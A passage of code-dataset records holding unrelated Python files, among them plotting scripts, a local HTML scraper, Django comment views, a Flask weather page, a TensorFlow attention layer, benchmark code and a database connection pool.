%H:%M:%S')\ndate=date[mini:maxi]\ntemp=temp[mini:maxi]\nsalinity=salinity[mini:maxi]\nnumbers=numbers[mini:maxi]\n\nfilename='/Users/linfan/projects/zzd/t_S_Data/1$1S6343_copy'\ninfo=np.genfromtxt(filename,delimiter=',',dtype=str)\ninfo = np.array(info)\nday = info[:,1]\nT = info[:,2]\nsali1 = info[:,3]\nsali2 = info[:,4]\nsali1 = list(sali1)\nday = list(day)\nsali2 = list(sali2)\n\nfor i in range(0,len(T)):\n T[i]=float(T[i])/1000\n sali1[i]=sali1[i]+sali2[i]\n sali1[i] = str(sali1[i].replace('\"',''))\n sali1[i]=float(sali1[i])/10\n day[i] = str(day[i].replace('.','-'))\n day[i] = datetime.strptime(day[i],\"%d-%m-%y 
%H:%M:%S\")\n\n#plt.style.use('bmh')\nfig,ax1=pylab.subplots()\np1,=ax1.plot(date,temp,'-',color=c,lw=l,alpha=a,mec='none')\np3,=ax1.plot(day,T,'--',color=c,lw=l,alpha=a,mec='none')\nax1.yaxis.label.set_color(p1.get_color())\nax1.tick_params(axis='y', colors=p1.get_color())\nax1.set_ylabel('$Temperature$($\\degree C$)')\nax1.set_ylim(2,10)\nax1.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%b-%d'))\npylab.xlabel('$Date$')\npylab.legend(['6350','6343'],loc='lower right')\nax2=ax1.twinx()\np2,=ax2.plot(date,salinity,'-',color=d,lw=l,alpha=a,mec='none')\np4,=ax2.plot(day,sali1,'--',color=d,lw=l,alpha=a,mec='none')\nax2.set_ylim(20,32)\nax2.yaxis.label.set_color(p2.get_color())\nax2.tick_params(axis='y', colors=p2.get_color())\nax2.set_ylabel('$Salinity$')\npylab.title('$Sensor$ $6343&6350$, $2015$')\npylab.xlabel('$Date$')\npylab.xlim(day[1],date[-1])\n#pylab.savefig('figures/6343&6350.png',dpi=400,bbox_inches='tight')\npylab.show()\n\n","sub_path":"zzd/double_plot.py","file_name":"double_plot.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"627552316","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nwith open('simplehtml.html') as html_file:\r\n soup=BeautifulSoup(html_file ,'lxml')\r\n\r\narticles= soup.find_all('div' ,class_='article')\r\nfor article in articles:\r\n headline = article.h2.a.text\r\n print(headline)\r\n\r\n content = article.p.text\r\n print(content)\r\n print('\\n \\n')\r\n\r\n\r\n","sub_path":"FIRST ATTEPT TO WEBSCRAPE/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"509241911","text":"# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# or in the \"license\" file accompanying this file. This file is distributed\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either\n# express or implied. 
See the License for the specific language governing\n# permissions and limitations under the License.\n\nimport pandas as pd\nimport numpy as np\n\nfrom gluonts.mx import SimpleFeedForwardEstimator, Trainer\n\n\ndef test_incremental_training_smoke_mx():\n estimator = SimpleFeedForwardEstimator(\n prediction_length=6,\n trainer=Trainer(epochs=2),\n )\n\n dataset = [\n {\"start\": pd.Period(\"2022-03-04 00\", \"1H\"), \"target\": np.ones((100,))},\n {\"start\": pd.Period(\"2022-04-05 00\", \"1H\"), \"target\": np.ones((100,))},\n ]\n\n predictor = estimator.train(dataset)\n _ = estimator.train_from(predictor, dataset)\n","sub_path":"test/mx/model/test_mx_incremental_training.py","file_name":"test_mx_incremental_training.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"454976695","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: D:\\dev\\cocos2020\\test\\test_schedule.py\n# Compiled at: 2020-01-10 23:58:31\n# Size of source mod 2**32: 1404 bytes\nfrom __future__ import division, print_function, unicode_literals\nimport sys, os\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))\ntestinfo = 't 0.1, s, t 2, s, t 4, s, q'\ntags = 'schedule, position'\nimport cocos\nimport cocos.director as director\nfrom cocos.sprite import Sprite\nimport pyglet, random\nfrom math import sin, cos\n\nclass TestLayer(cocos.layer.Layer):\n\n def __init__(self):\n super(TestLayer, self).__init__()\n self.sprite = Sprite('grossini.png')\n self.add(self.sprite)\n w, h = director.get_window_size()\n self.radius = h / 3.0\n self._elapsed = 0.0\n self.schedule(self.change_sprite_pos)\n self.change_sprite_pos(0.0)\n\n def change_sprite_pos(self, dt):\n self._elapsed += dt\n w, h = director.get_window_size()\n self.sprite.position = (w // 2 + self.radius * cos(self._elapsed * 1.5),\n h // 2 + self.radius * sin(self._elapsed * 1.5))\n\n\ndescription = '\\nGrossini sprite will circle around the center of the screen\\n'\n\ndef main():\n print(description)\n director.init()\n test_layer = TestLayer()\n main_scene = cocos.scene.Scene(test_layer)\n director.run(main_scene)\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/cocoscore-1.0.0-py2.py3-none-any/test_schedule.cpython-38.py","file_name":"test_schedule.cpython-38.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"29017327","text":"import json\n\n\ndef get_json(path, g):\n mode = g.get('mode')\n with open(path, 'r') as f:\n try:\n draw = int(g.get('draw', '1'))\n\n start = int(g.get('start', '0'))\n offset = int(g.get('offset', '0'))\n start = start if start != 0 else offset\n\n length = int(g.get('length', '0'))\n limit = int(g.get('limit', '9'))\n length = length if length != 0 else limit\n\n length = 20 if length > 20 else length\n\n json_load = json.load(f)\n if 'data' in json_load:\n init_json = json_load['data']\n else:\n init_json = []\n init_length = len(init_json)\n\n if mode == 'datatable':\n output = {}\n output['draw'] = draw\n output['recordsTotal'] = init_length\n output['recordsFiltered'] = init_length\n output['data'] = []\n for i in range(start, start + length):\n if i > init_length - 1:\n break\n output['data'].append(init_json[i])\n\n else:\n output = []\n for i in range(start, start + 
length):\n if i > init_length - 1:\n break\n output.append(init_json[i])\n\n except ValueError:\n output = {} if mode == 'datatable' else []\n\n return json.dumps(output)\n","sub_path":"cmscore.old/partial/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"422348378","text":"import matplotlib\nmatplotlib.use('Agg')\nfrom skimage import io\nfrom skimage import transform\nfrom numpy.linalg import svd\nimport numpy as np \nimport time,os,sys\nfrom math import log, floor\nimport pickle\nfrom random import shuffle\nimport argparse\nimport matplotlib.pyplot as plt\nfrom PIL import Image\ndef reconstruction(U,k,img,train_data_path,target_image):\n\tprint(target_image)\n\trecon_des = io.imread(os.path.join(train_data_path, target_image))\n\trecon_des = recon_des.flatten()\n\trecon_des = recon_des.astype(np.float)\n\trecon_des = recon_des / 255\n\tweight = []\n\tfor i in range(k):\n\t\teigenfaces = U[:,i]\n\t\tw = np.dot(recon_des,eigenfaces)\n\t\tweight.append(w)\n\trecon_img = np.zeros([len(recon_des),])\n\tfor i in range(len(weight)):\n\t\teigenfaces = U[:,i]\n\t\ttemp = weight[i]*eigenfaces\n\t\trecon_img = recon_img + temp\n\timg_mean = np.mean(img, axis=1)\n\trecon_img = recon_img + img_mean\n\n\treturn recon_img\ndef draw_reconstruct_image(recon_img):\n\trecon_img -= np.min(recon_img)\n\trecon_img /= np.max(recon_img)\n\trecon_img = (recon_img * 255).astype(np.uint8)\n\trecon_img = recon_img.reshape(600,600,3)\n\tplt.axis('off')\n\tplt.imshow(recon_img)\n\tplt.savefig('temp.png')\n\tImage.open('temp.png').save('reconstruction.jpg','JPEG')\n\treturn 'draw' \ndef main(opts):\n\ttrain_data_path = opts.train_data_path\n\ttarget_image = opts.target_image\n\tsave_dir = opts.save_dir\n\toutput_path = opts.output_path\n\tk = 4\n\tdirs = os.listdir(train_data_path)\n\t\n\tfor i,f in enumerate(dirs):\n\t\tif i == 0:\n\t\t\timg = io.imread(os.path.join(train_data_path, f))\n\t\t\timg = img.flatten()\n\t\t\timg = img.reshape(len(img),1)\n\t\t\tcontinue\n\t\ttemp_img = io.imread(os.path.join(train_data_path, f))\n\t\ttemp_img = temp_img.flatten()\n\t\ttemp_img = temp_img.reshape(len(temp_img),1)\n\t\timg = np.concatenate((img, temp_img), axis=1)\n\timg = img.astype(np.float)\n\timg = img / 255\n\tprint(img.shape)\n\timg_mean = np.mean(img, axis=1)\n\timg_mean = img_mean.reshape(len(img_mean),1)\n\tprint(img_mean.shape)\n\tU, s, V = svd(img - img_mean, full_matrices=False)\n\t#draw_reconstruct_image(U[:,3])\n\t\n\trecon_img = reconstruction(U,k,img,train_data_path,target_image)\n\tdraw_reconstruct_image(recon_img)\n\t\nif __name__ == '__main__':\n\t\n\tparser = argparse.ArgumentParser(description='image clustering dask')\n\tparser.add_argument('--train_data_path',type=str,default='Aberdeen/',dest='train_data_path',help='path to training data')\n\tparser.add_argument('--target_image',type=str,default='414.jpg',dest='target_image',help='path to testing data')\n\tparser.add_argument('--save_dir',type=str,default='models/',dest='save_dir',help='path to save the model parameters')\n\tparser.add_argument('--output_path',type=str,default='Result_output/result.csv',dest='output_path',help='path to save the model outputs')\n\t\n\topts = parser.parse_args()\n\n\tmain(opts)","sub_path":"hw6/pca_coloredfaces.py","file_name":"pca_coloredfaces.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
+{"seq_id":"639933471","text":"import sys\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef get_phi_dfem(output_folder):\n num_cells = np.loadtxt(output_folder + \"number_of_cells\", dtype=int)\n num_nodes = np.loadtxt(output_folder + \"number_of_nodes\", dtype=int)\n num_groups = np.loadtxt(output_folder + \"number_of_groups\", dtype=int)\n cell_length = np.loadtxt(output_folder + \"cell_length\");\n phiout = np.loadtxt(output_folder + \"phi\")\n \n points = np.zeros(num_nodes*num_cells)\n tempsum = 0.\n for i in range(num_cells):\n points[num_nodes*i] = tempsum\n \n tempsum += cell_length[i]\n \n points[1 + num_nodes*i] = tempsum;\n \n phi = np.zeros((num_cells*num_nodes, num_groups))\n for i in range(num_cells):\n for g in range(num_groups):\n for n in range(num_nodes):\n phi[n + num_nodes*i, g] = phiout[n + num_nodes*(g + num_groups*i)]\n\n return points, phi\n\n\nif (len(sys.argv) != 2):\n print(\"usage: plot_error [dir]\")\n sys.exit()\n\ndirectory = sys.argv[1]\npoints, phi = get_phi_dfem(directory)\n\nplt.plot(points, phi)\nplt.savefig(directory + \"phi.pdf\")\n","sub_path":"python/dfem_plot.py","file_name":"dfem_plot.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"636847859","text":"# -*- coding:utf-8 -*-\nfrom django.shortcuts import redirect, get_object_or_404, HttpResponse\n\nfrom .forms import CommentsForm\nfrom .models import Comment\nfrom post.models import Post\nfrom user_info.models import UserInfo\nfrom user_info.views import delete_file\nfrom django.utils import timezone\n\nimport json\nimport random\n# Create your views here.\n\n\ndef create_comments(request, post_id):\n post = Post.objects.get(pk=post_id)\n form = CommentsForm(request.POST, request.FILES)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.post = post\n obj.author = request.user\n obj.save()\n obj.patch_date = obj.pub_date\n obj.save()\n return redirect('/id%s' % post.page.id)\n return redirect('/')\n\n\ndef del_comments(request, comment_id):\n comment = Comment.objects.get(pk=comment_id)\n post = comment.post\n if request.user == comment.author or request.user == post.author or request.user == post.page:\n delete_file(comment)\n comment.delete()\n return redirect('/id%s' % post.page.id)\n return redirect('/')\n\n\ndef update_comment(request, comment_id):\n comment = Comment.objects.get(pk=comment_id)\n post = comment.post\n form = CommentsForm(request.POST, request.FILES)\n if form.is_valid() and request.user == comment.author:\n comment.body = request.POST['body']\n comment.patch_date = timezone.now()\n if 'image' in request.FILES:\n delete_file(comment)\n comment.image = request.FILES['image']\n comment.save()\n return redirect('/id%s' % post.page.id)\n return redirect('/')\n\n\ndef like_comment(request, comment_id):\n comment = get_object_or_404(Comment, pk=comment_id)\n likes = comment.likes.all()\n if request.user not in likes:\n comment.likes.add(request.user)\n else:\n comment.likes.remove(request.user)\n comment.save()\n return redirect(request.META.get('HTTP_REFERER') + '#comment_%s' % (comment_id))\n\n\ndef like_comment_ajax(request):\n if request.method == 'POST':\n comment = Comment.objects.get(pk=request.POST.get('id', ''))\n if not comment:\n return HttpResponse('Ошибка 37...', content_type='text/html')\n likes = comment.likes.all()\n data = dict()\n if request.user not in likes:\n comment.likes.add(request.user)\n data['type'] = 'like'\n else:\n 
comment.likes.remove(request.user)\n data['type'] = 'dislike'\n else:\n return HttpResponse('Ошибка 37...', content_type='text/html')\n comment.like_list = comment.likes.all()\n comment.like_number = comment.likes.count()\n if comment.like_number > 4:\n comment.rand_like = list()\n if request.user in comment.like_list:\n comment.rand_like.append(request.user)\n j = random.sample(range(0, comment.like_number), 4)\n for i in j:\n if comment.likes.all()[i] == request.user:\n pass\n else:\n comment.rand_like.append(comment.likes.all()[i])\n if len(comment.rand_like) == 4:\n break\n else:\n j = random.sample(range(0, comment.like_number), 4)\n for i in j:\n comment.rand_like.append(comment.likes.all()[i])\n else:\n comment.rand_like = list()\n if request.user in comment.like_list:\n comment.rand_like.append(request.user)\n for i in comment.like_list:\n if i != request.user:\n comment.rand_like.append(i)\n for i in comment.rand_like:\n i.info = UserInfo.objects.get(user=i.id)\n data['like_num'] = comment.like_number\n return HttpResponse(json.dumps(data), content_type='text/html')\n","sub_path":"comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"448506310","text":"#!/usr/bin/python\nimport os\nimport sqlite3\nfrom utils import SIFT\nfrom utils import getImageHashValues\nimport numpy as np\n\nconn = sqlite3.connect('datasets.db')\nprint(\"Opened database successfully\")\nc = conn.cursor()\nKV = []\n\n# images\nc.execute(\"INSERT INTO DATASET (ID,NAME,TYPE,ADDRESS) \\\n VALUES (2, 'Image Dataset', 'IMAGE', 'IMDS')\")\n\nc.execute('''CREATE TABLE IMDS\n (ID INTEGER PRIMARY KEY AUTOINCREMENT,\n NAME CHAR(20) NOT NULL,\n ADDRESS char(80) NOT NULL,\n HASH BLOB NOT NULL);''')\n\nimage_root = 'Image/mirflickr1m/images';\ndef getRelativePath(path):\n return path[path.find(image_root):]\n\ndef abs(x):\n if x < 0:\n return -x\n return x\n\ndef dis(a, b):\n d = 0\n for i in range(len(a)):\n d += abs(a[i]-b[i])\n return d\n\ndef nearest(v):\n min = 99999999999\n ans = []\n for s in KV:\n d = dis(s, v)\n if d < min:\n min = d\n ans = s\n return ans\n\ndef visitPath(path):\n list = os.listdir(path)\n for file in list:\n _path = path + '/' + file\n if os.path.isfile(_path):\n kpdes = SIFT(_path)\n vectors = kpdes[1]\n print('Old vector: ', vectors)\n vectors_new = []\n for v in vectors:\n vectors_new.append(nearest(v))\n print('New vector: ',vectors_new)\n hashvalue = getImageHashValues(vectors_new).tobytes()\n c.execute(\"insert into IMDS values (null, ?, ?, ?)\", (file, getRelativePath(_path), hashvalue))\n c.execute(\"insert into IMDS values (null, ?, ?, ?)\", (file, getRelativePath(_path), 0))\n else:\n visitPath(_path)\n\nKV = np.load('../Image/mirflickr1m/centroid/0-iteration.npy')\nif os.path.exists(image_root):\n visitPath(image_root)\nelse:\n visitPath('../' + image_root)\nconn.commit()\nconn.close()","sub_path":"database_image.py","file_name":"database_image.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"80032851","text":"import time\nimport random\nfrom collections import OrderedDict\n\nfrom Splay import Splay\n\n\ndef randomized():\n print(\"#########################\")\n print(\"Random distribution of data\")\n print(\"#########################\")\n operations = OrderedDict({\n \"Insert\": lambda b, x: b.insert(x),\n \"Search\": lambda b, x: b.search(x),\n 
\"Delete\": lambda b, x: b.delete(x),\n })\n for n in range(1000, 100001, 2000):\n b = Splay()\n for name in operations:\n start = time.time()\n op = operations[name]\n for i in random.sample(range(0, n), n):\n op(b, i)\n elapsed = time.time() - start\n print('{},{},{}'.format(name, n, round(1000 * elapsed, 4)))\n\n\ndef recurring():\n print(\"#########################\")\n print(\"Recurring data\")\n print(\"#########################\")\n for n in range(1000, 100000, 2000):\n b = Splay()\n for i in random.sample(range(0, n), n):\n b.insert(i)\n start = time.time()\n for i in [random.randint(400, 405) for _ in range(n)]:\n b.search(i)\n\n elapsed = time.time() - start\n print('{}'.format(round(1000 * elapsed, 4)))\n\n\ndef sequential():\n print(\"#########################\")\n print(\"Sequential data\")\n print(\"#########################\")\n operations = OrderedDict({\n \"Insert\": lambda b, x: b.insert(x),\n \"Search\": lambda b, x: b.search(x),\n \"Delete\": lambda b, x: b.delete(x),\n })\n for n in range(10, 1001, 20):\n b = Splay()\n for name in operations:\n op = operations[name]\n values = list(range(n))\n if name == \"Delete\":\n values.reverse()\n start = time.time()\n for i in values:\n op(b, i)\n elapsed = time.time() - start\n print('{},{},{}'.format(name, n, round(1000 * elapsed, 4)))\n\n\ndef run():\n print(\"** Splay Tree **\")\n randomized()\n recurring()\n sequential()","sub_path":"report/report_Splay.py","file_name":"report_Splay.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"361739923","text":"import FWCore.ParameterSet.Config as cms\n\n\neventBranches = cms.PSet(\n floats = cms.PSet(\n pvndof = cms.string('pvndof'),\n pvZ = cms.string('pvZ'),\n pvRho = cms.string('pvRho'),\n type1_pfMETEt = cms.string('type1_pfMETEt'),\n type1_pfMETPhi = cms.string('type1_pfMETPhi'),\n Flag_BadPFMuonFilterPass = cms.string('? hasUserFloat(\"Flag_BadPFMuonFilterPass\") ? '\n 'userFloat(\"Flag_BadPFMuonFilterPass\") : 100'),\n Flag_BadChargedCandidateFilterPass = cms.string('? hasUserFloat(\"Flag_BadChargedCandidateFilterPass\") ? 
'\n 'userFloat(\"Flag_BadChargedCandidateFilterPass\") : 100'),\n ),\n vFloats = cms.PSet(\n jetPt = cms.vstring('jetPt'),\n jetEta = cms.vstring('jetEta'),\n jetPhi = cms.vstring('jetPhi'),\n jetDeepCSV = cms.vstring('jetDeepCSV'),\n ),\n vInts = cms.PSet(\n jetPUID = cms.vstring('jetPUID'),\n isGenJetMatched = cms.vstring('isGenJetMatched'),\n jetHadronFlavor = cms.vstring('jetHadronFlavor'),\n ),\n bools = cms.PSet(\n pvIsValid = cms.string('pvIsValid'),\n pvIdFake = cms.string('pvIsFake'),\n ),\n uints = cms.PSet(\n lumi = cms.string('lumi'),\n run = cms.string('run'),\n nvtx = cms.string('nvtx'),\n nJets = cms.string('nJets'),\n ),\n ulls = cms.PSet(\n evt = cms.string('evt'),\n ),\n )\nL1ECALPrefiringBranches = cms.PSet(\n floats = cms.PSet(\n L1prefiringWeight = cms.string('L1prefiringWeight'),\n L1prefiringWeightUp = cms.string('L1prefiringWeightUp'),\n L1prefiringWeightDn = cms.string('L1prefiringWeightDn'),\n ),\n )\nlheScaleWeightBranches = cms.PSet(\n vFloats = cms.PSet(\n scaleWeights = cms.vstring('lheWeights::0,9'),\n ),\n floats = cms.PSet(\n minScaleWeight = cms.string('minLHEWeight::0,9'),\n maxScaleWeight = cms.string('maxLHEWeight::0,9'),\n ),\n )\n\nlheScaleAndPDFWeightBranches = cms.PSet(\n vFloats = cms.PSet(\n scaleWeights = cms.vstring('lheWeights::0,9'),\n pdfWeights = cms.vstring('lheWeights::9,111'),\n ),\n floats = cms.PSet(\n minScaleWeight = cms.string('minLHEWeight::0,9'),\n maxScaleWeight = cms.string('maxLHEWeight::0,9'),\n ),\n )\n\nlheAllWeightBranches = cms.PSet(\n vFloats = cms.PSet(\n scaleWeights = cms.vstring('lheWeights::0,9'),\n pdfWeights = cms.vstring('lheWeights::9,9999'),\n ),\n floats = cms.PSet(\n minScaleWeight = cms.string('minLHEWeight::0,9'),\n maxScaleWeight = cms.string('maxLHEWeight::0,9'),\n ),\n )\n\n# gen information branches for regular ntuple\neventGenBranches = cms.PSet(\n floats = cms.PSet(\n genWeight = cms.string('genWeight'),\n nTruePU = cms.string('nTruePU'),\n originalXWGTUP=cms.string('originalXWGTUP'),\n ),\n )\n\n# event branches for gen ntuple\ngenNtupleEventBranches = cms.PSet(\n floats = cms.PSet(\n genWeight = cms.string('genWeight'),\n ),\n vFloats = cms.PSet(\n jetPt = cms.vstring('genJetPt'),\n jetEta = cms.vstring('genJetEta'),\n jetPhi = cms.vstring('genJetPhi'),\n ),\n uints = cms.PSet(\n lumi = cms.string('lumi'),\n run = cms.string('run'),\n nJets = cms.string('nGenJets'),\n ),\n ulls = cms.PSet(\n evt = cms.string('evt'),\n ),\n )\n\njetSystematicBranches = cms.PSet(\n floats = cms.PSet(\n jetPUSFmulfac = cms.string('jetPUSFmulfac'),\n ),\n vFloats = cms.PSet(\n jetPt_jesUp = cms.vstring('jetPt::jesUp'),\n jetPt_jesDown = cms.vstring('jetPt::jesDown'),\n jetPt_jerUp = cms.vstring('jetPt::jerUp'),\n jetPt_jerDown = cms.vstring('jetPt::jerDown'),\n jetEta_jesUp = cms.vstring('jetEta::jesUp'),\n jetEta_jesDown = cms.vstring('jetEta::jesDown'),\n jetEta_jerUp = cms.vstring('jetEta::jerUp'),\n jetEta_jerDown = cms.vstring('jetEta::jerDown'),\n ),\n vInts = cms.PSet(\n jetPUID_jesUp = cms.vstring('jetPUID::jesUp'),\n jetPUID_jesDown = cms.vstring('jetPUID::jesDown'),\n jetPUID_jerUp = cms.vstring('jetPUID::jerUp'),\n jetPUID_jerDown = cms.vstring('jetPUID::jerDown'),\n ),\n uints = cms.PSet(\n nJets_jesUp = cms.string('nJets::jesUp'),\n nJets_jesDown = cms.string('nJets::jesDown'),\n nJets_jerUp = cms.string('nJets::jerUp'),\n nJets_jerDown = cms.string('nJets::jerDown'),\n ),\n )\n\n# gen-level initial state info for reco ntuple\ngenInitialStateBranches = cms.PSet(\n floats = cms.PSet(\n GenMass = 
cms.string('genInitialStateMass'),\n GenPt = cms.string('genInitialStatePt'),\n GenEta = cms.string('genInitialStateEta'),\n GenPhi = cms.string('genInitialStatePhi'),\n ),\n )\n\ndressedGenCompositeStateBranches = cms.PSet(\n floats = cms.PSet(\n UndressedMass = cms.string('undressedMass'),\n UndressedPt = cms.string('undressedPt'),\n UndressedEta = cms.string('undressedEta'),\n UndressedPhi = cms.string('undressedPhi'),\n ),\n )\n","sub_path":"Ntuplizer/python/templates/eventBranches.py","file_name":"eventBranches.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"92979668","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport capslayer as cl\nimport tensorflow as tf\n\n\ndef selfAttention(x, ch, name='attention'):\n '''\n Self-Attention mechanism from: https://github.com/taki0112/Self-Attention-GAN-Tensorflow\n '''\n with tf.compat.v1.variable_scope(name):\n\n f = tf.layers.conv2d(x, ch // 8, kernel_size=1, strides=1) \n g = tf.layers.conv2d(x, ch // 8, kernel_size=1, strides=1)\n h = tf.layers.conv2d(x, ch // 1, kernel_size=1, strides=1)\n\n # N = h * w\n s = tf.matmul(hw_flatten(g), hw_flatten(f), transpose_b=True) # # [bs, N, N]\n\n beta = tf.nn.softmax(s) # attention map\n\n o = tf.matmul(beta, hw_flatten(h)) # [bs, N, C]\n gamma = tf.get_variable(\"gamma\", [1], initializer=tf.constant_initializer(0.0))\n\n shape = cl.shape(x)\n o = tf.reshape(o, shape=shape) # [bs, h, w, C]\n\n # check this out: SACN doesn't use this 1x1 conv, but SAGAN does\n o = tf.layers.conv2d(o, ch, kernel_size=1, strides=1)\n\n x = gamma * o + x\n\n return x\n\n\ndef hw_flatten(x) :\n shape = cl.shape(x)\n return tf.reshape(x, [-1, shape[1]*shape[2], shape[3]])\n","sub_path":"capslayer/layers/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"53247649","text":"from flask import Flask\r\nfrom flask import render_template\r\nimport requests\r\nimport json\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/home')\r\ndef homepage():\r\n #Print(\"Is this thing on?\")\r\n return \"
Hello World!
\"\r\n\r\n@app.route('/')\r\ndef test():\r\n response = requests.get(\"https://api.weather.gov/gridpoints/SEW/130,67/forecast\")\r\n text = response.text\r\n json_string = json.loads(text)\r\n properties = json_string['properties']\r\n periods = properties['periods']\r\n ## periods is a list\r\n ##day1\r\n day1 = periods[0]\r\n name1 = day1[\"name\"]\r\n temp1 = day1[\"temperature\"]\r\n cast1 = day1[\"shortForecast\"]\r\n ##day2\r\n day2 = periods[1]\r\n name2 = day2[\"name\"]\r\n temp2 = day2[\"temperature\"]\r\n cast2 = day2[\"shortForecast\"]\r\n ##day3\r\n day3 = periods[2]\r\n name3 = day3[\"name\"]\r\n temp3 = day3[\"temperature\"]\r\n cast3 = day3[\"shortForecast\"]\r\n ##day4\r\n day4 = periods[3]\r\n name4 = day4[\"name\"]\r\n temp4 = day4[\"temperature\"]\r\n cast4 = day4[\"shortForecast\"]\r\n ##day5\r\n day5 = periods[4]\r\n name5 = day5[\"name\"]\r\n temp5 = day5[\"temperature\"]\r\n cast5 = day5[\"shortForecast\"]\r\n return render_template(\"west.html\", day1name=name1, day2name=name2, day3name=name3, day4name=name4, day5name=name5, day1temp=temp1, day2temp=temp2, day3temp=temp3, day4temp=temp4, day5temp=temp5, day1cast=cast1, day2cast=cast2, day3cast=cast3, day4cast=cast4,day5cast=cast5)\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n#this is a comment","sub_path":"west_us/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"636494951","text":"import os\n\nimport pandas as pd\nimport psycopg2\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom user_similarity_model.config.core import DATASET_DIR, SQL_DIR, config\n\n\ndef load_csv_files(filename):\n \"\"\"read csv files bases on the filename\n\n Args:\n filename ([type]): name of the file\n\n Returns:\n DataFrame: A csv file\n \"\"\"\n csv_file = pd.read_csv(os.path.join(DATASET_DIR, filename))\n return csv_file\n\n\ndef _create_tables():\n \"\"\" create tables schema in the PostgreSQL database\"\"\"\n conn = None\n try:\n conn = psycopg2.connect(**config.app_config.database_specs)\n cur = conn.cursor()\n with open(os.path.join(SQL_DIR, \"tabels-schema.sql\")) as file:\n query = file.read()\n cur.execute(query)\n # close communication with the PostgreSQL database server\n cur.close()\n # commit the changes\n conn.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n\n\ndef upload_csv():\n \"\"\"Upload the csv to tables in the PostgreSQL database using the\n credentials in the config.yml file\n \"\"\"\n _create_tables()\n specs = config.app_config.database_specs\n engine = None\n engine = SQLAlchemy.create_engine(\n \"postgresql+psycopg2://{}:{}@{}:{}/{}?sslmode=require\".format(\n specs[\"user\"],\n specs[\"password\"],\n specs[\"host\"],\n specs[\"port\"],\n specs[\"dbname\"],\n )\n )\n for file in config.app_config.csv_files:\n load_csv_files(file).to_sql(file[0:-4], engine, if_exists=\"replace\")\n","sub_path":"user_similarity_model/processing/data_upload_manager.py","file_name":"data_upload_manager.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"548380644","text":"#!/usr/bin/env python\r\nfrom __future__ import with_statement\r\n\r\nimport time\r\nfrom datetime import datetime\r\nimport threading\r\nimport weakref\r\n\r\nclass FakeLock(object):\r\n def __enter__(self):\r\n return self\r\n\r\n def 
__exit__(self, exc_type, exc_value, traceback):\r\n pass\r\n\r\nclass BaseConnection(object):\r\n @property\r\n def connected(self):\r\n raise NotImplemented()\r\n \r\n def reconnect(self):\r\n raise NotImplemented()\r\n \r\n def reset(self):\r\n pass\r\n \r\n def __del__(self):\r\n self.reset()\r\n \r\n if hasattr(self, '_pool'):\r\n self._pool.put(self)\r\n\r\nclass ConnectionPool(object):\r\n WAIT_FOREVER = None\r\n WAIT_NERVER = 0\r\n \r\n def __init__(self, connection_creator, min_connections=0, max_connections=10,\r\n multithreads=False):\r\n self.connection_creator = connection_creator\r\n self.min_connections = min_connections\r\n self.max_connections = max_connections\r\n \r\n self.lock = threading.Lock() if multithreads else FakeLock()\r\n self.idle_notify = threading.Event() if multithreads else None\r\n self.idle_conns = []\r\n self.used_conns = weakref.WeakKeyDictionary()\r\n \r\n if self.min_connections: \r\n for i in range(self.min_connections):\r\n conn = self.connection_creator()\r\n \r\n if conn:\r\n self.idle_conns.append(conn)\r\n \r\n def __nonzero__(self):\r\n with self.lock:\r\n return (len(self.idle_conns) > 0) or 